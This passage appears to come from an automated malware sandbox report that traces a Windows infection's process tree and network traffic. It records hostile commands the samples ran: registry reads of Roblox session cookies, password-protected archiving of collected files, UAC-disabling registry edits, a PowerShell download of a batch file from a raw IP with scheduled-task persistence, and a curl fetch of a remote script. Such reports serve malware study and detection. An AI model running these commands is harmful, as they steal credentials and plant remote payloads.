        PID:5404
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:4688
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:6408
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1536"
        5⤵
        
        PID:6812
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1536
        6⤵
        Kills process with taskkill
        
        PID:6816
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1536"
        5⤵
        
        PID:6648
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1536
        6⤵
        Kills process with taskkill
        
        PID:2728
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4192"
        5⤵
        
        PID:6464
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4192
        6⤵
        Kills process with taskkill
        
        PID:7140
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        5⤵
        
        PID:5796
      - C:\Windows\system32\getmac.exe
        
        getmac
        6⤵
        
        PID:5404
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 536"
        5⤵
        
        PID:2256
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 536
        6⤵
        Kills process with taskkill
        
        PID:7068
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4192"
        5⤵
        
        PID:6916
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6708
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4192
        6⤵
        Kills process with taskkill
        
        PID:3652
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 536"
        5⤵
        
        PID:6844
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 536
        6⤵
        Kills process with taskkill
        
        PID:5508
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2032"
        5⤵
        
        PID:6300
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6368
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2032
        6⤵
        Kills process with taskkill
        
        PID:5772
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4372"
        5⤵
        
        PID:6028
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4372
        6⤵
        Kills process with taskkill
        
        PID:6868
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2032"
        5⤵
        
        PID:6980
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2032
        6⤵
        Kills process with taskkill
        
        PID:3884
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 376"
        5⤵
        
        PID:4444
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5188
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 376
        6⤵
        Kills process with taskkill
        
        PID:6000
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4372"
        5⤵
        
        PID:4984
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4372
        6⤵
        Kills process with taskkill
        
        PID:6532
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3628"
        5⤵
        
        PID:3140
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3628
        6⤵
        Kills process with taskkill
        
        PID:5320
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 376"
        5⤵
        
        PID:2136
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 376
        6⤵
        Kills process with taskkill
        
        PID:5368
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5544"
        5⤵
        
        PID:5364
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5544
        6⤵
        Kills process with taskkill
        
        PID:7124
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3628"
        5⤵
        
        PID:5972
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6372
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3628
        6⤵
        Kills process with taskkill
        
        PID:5388
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5556"
        5⤵
        
        PID:6780
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5556
        6⤵
        Kills process with taskkill
        
        PID:6192
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5544"
        5⤵
        
        PID:6672
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5544
        6⤵
        Kills process with taskkill
        
        PID:4144
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:1216
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6824
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5556"
        5⤵
        
        PID:1872
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5556
        6⤵
        Kills process with taskkill
        
        PID:6952
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:6124
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5148
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI60042\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\9xyp6.zip" *"
        5⤵
        
        PID:7092
      - C:\Users\Admin\AppData\Local\Temp\_MEI60042\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI60042\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\9xyp6.zip" *
        6⤵
        Executes dropped EXE
        
        PID:6992
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        5⤵
        
        PID:5404
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5796
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        6⤵
        
        PID:6624
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        5⤵
        
        PID:6428
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4688
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        6⤵
        
        PID:6620
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:5508
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:3396
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        5⤵
        
        PID:4452
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:7000
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:2568
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:2012
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        5⤵
        
        PID:5352
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3156
- - C:\Users\Admin\AppData\Local\Temp\Files\jrockekcurje.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\jrockekcurje.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4848
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\jrockekcurje.exe" /rl HIGHEST /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:4584
- - C:\Users\Admin\AppData\Local\Temp\Files\Rar.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Rar.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6076
- C:\ProgramData\Synaptics\Synaptics.exe
  "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4528
- - C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
    3⤵
    - Downloads MZ/PE file
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:628
  - - C:\Users\Admin\AppData\Local\Temp\Files\NVIDIA.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\NVIDIA.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:1996
  - - C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3568
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6FA2.tmp\6FA3.tmp\6FA4.bat C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4384
      - C:\Windows\system32\mshta.exe
        
        mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
        6⤵
        Checks computer location settings
        Access Token Manipulation: Create Process with Token
        Suspicious use of WriteProcessMemory
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE" goto :target
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2316
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\71E4.tmp\71E5.tmp\71E6.bat C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE goto :target"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:5056
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
        9⤵
        UAC bypass
        
        PID:3140
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
        9⤵
        UAC bypass
        
        PID:2104
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
        9⤵
        UAC bypass
        
        PID:836
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:3056
        
        C:\Windows\system32\reg.exe
        
        reg query HKEY_CLASSES_ROOT\http\shell\open\command
        10⤵
        
        PID:3172
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
        9⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:1536
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbe1e646f8,0x7ffbe1e64708,0x7ffbe1e64718
        10⤵
        
        PID:4192
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2380 /prefetch:2
        10⤵
        
        PID:536
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 /prefetch:3
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2032
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:8
        10⤵
        
        PID:4372
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
        10⤵
        
        PID:376
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
        10⤵
        
        PID:3628
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1
        10⤵
        
        PID:2640
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
        10⤵
        
        PID:3140
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5208
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
        10⤵
        
        PID:5296
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
        10⤵
        
        PID:5304
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
        10⤵
        
        PID:5544
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
        10⤵
        
        PID:5556
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h d:\net
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
        9⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:448
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3176
  - - C:\Users\Admin\AppData\Local\Temp\Files\loader.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:6036
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "payload.bat"
        5⤵
        
        PID:6068
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_PointingDevice get PNPDeviceID /value | find "PNPDeviceID"
        6⤵
        
        PID:5084
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_PointingDevice get PNPDeviceID /value
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4024
        
        C:\Windows\system32\find.exe
        
        find "PNPDeviceID"
        7⤵
        
        PID:4632
      - C:\Windows\system32\curl.exe
        
        curl -L -o python-installer.exe https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe --insecure --silent
        6⤵
        Downloads MZ/PE file
        
        PID:5500
      - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exe
        
        python-installer.exe /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4056
        
        C:\Windows\Temp\{79CADA77-5AB6-4321-9E1D-5E69CA5C2ECB}\.cr\python-installer.exe
        
        "C:\Windows\Temp\{79CADA77-5AB6-4321-9E1D-5E69CA5C2ECB}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exe" -burn.filehandle.attached=504 -burn.filehandle.self=556 /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:5176
        
        C:\Windows\Temp\{AAFB619C-4C23-4524-83B7-D7BA97AC7CEB}\.be\python-3.10.0rc2-amd64.exe
        
        "C:\Windows\Temp\{AAFB619C-4C23-4524-83B7-D7BA97AC7CEB}\.be\python-3.10.0rc2-amd64.exe" -q -burn.elevated BurnPipe.{B829E01E-B060-48EA-9C4E-7C09CEFD5DCE} {628768F2-F35B-48B8-A113-8B782201E304} 5176
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4240
      - C:\Windows\system32\curl.exe
        
        curl -o webpage.py -s https://rentry.co/sntwm349/raw --insecure
        6⤵
        
        PID:6672
  - - C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5320
  - - C:\Users\Admin\AppData\Local\Temp\Files\svc.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\svc.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks SCSI registry key(s)
      PID:2936
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 352
        5⤵
        Program crash
        
        PID:6708
  - - C:\Users\Admin\AppData\Local\Temp\Files\PrivacyPolicy.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\PrivacyPolicy.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3648
    - - C:\Users\Admin\AppData\Local\Temp\is-RP51D.tmp\PrivacyPolicy.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-RP51D.tmp\PrivacyPolicy.tmp" /SL5="$A0292,699759,54272,C:\Users\Admin\AppData\Local\Temp\Files\PrivacyPolicy.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3692
  - - C:\Users\Admin\AppData\Local\Temp\Files\BootstrapperNew.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\BootstrapperNew.exe"
      4⤵
      Executes dropped EXE
      PID:3480
  - - C:\Users\Admin\AppData\Local\Temp\Files\Autoupdate.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Autoupdate.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:5476

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3164

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4504

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1472

C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe" -service -lunch
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5396
- C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5408

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:6472

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
1⤵
PID:6724

C:\ProgramData\Desktop Window Manager.exe
"C:\ProgramData\Desktop Window Manager.exe"
1⤵
- Executes dropped EXE
PID:6260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2936 -ip 2936
1⤵
PID:6596

C:\ProgramData\Desktop Window Manager.exe
"C:\ProgramData\Desktop Window Manager.exe"
1⤵
- Executes dropped EXE
PID:2264

Network

DNS

urlhaus.abuse.ch

._cache_Synaptics.exe

Remote address:

8.8.8.8:53

Request

urlhaus.abuse.ch

IN A

Response

urlhaus.abuse.ch

IN CNAME

p2.shared.global.fastly.net

p2.shared.global.fastly.net

IN A

151.101.130.49

p2.shared.global.fastly.net

IN A

151.101.2.49

p2.shared.global.fastly.net

IN A

151.101.66.49

p2.shared.global.fastly.net

IN A

151.101.194.49
GET

https://urlhaus.abuse.ch/downloads/text_online/

._cache_Synaptics.exe

Remote address:

151.101.130.49:443

Request

GET /downloads/text_online/ HTTP/1.1
Host: urlhaus.abuse.ch
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 460347
Server: Apache
Strict-Transport-Security: max-age=15768000 ; includeSubDomains
Expect-CT: enforce, max-age=86400
Permissions-Policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), camera=(), encrypted-media=(), fullscreen=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), speaker=(), usb=(), vr=()
Referrer-Policy: strict-origin-when-cross-origin
Content-Security-Policy: default-src 'self' https://fonts.gstatic.com:443 https://region1.google-analytics.com:443 data:; style-src 'self' 'unsafe-inline' https://www.gstatic.com:443 https://fonts.googleapis.com:443 https://hcaptcha.com https://*.hcaptcha.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.gstatic.com:443 https://www.google.com/recaptcha/ https://www.googletagmanager.com:443 https://hcaptcha.com https://*.hcaptcha.com; frame-src https://www.google.com/recaptcha/ https://hcaptcha.com https://*.hcaptcha.com; img-src 'self' data: https://syndication.twitter.com:443; object-src 'none';
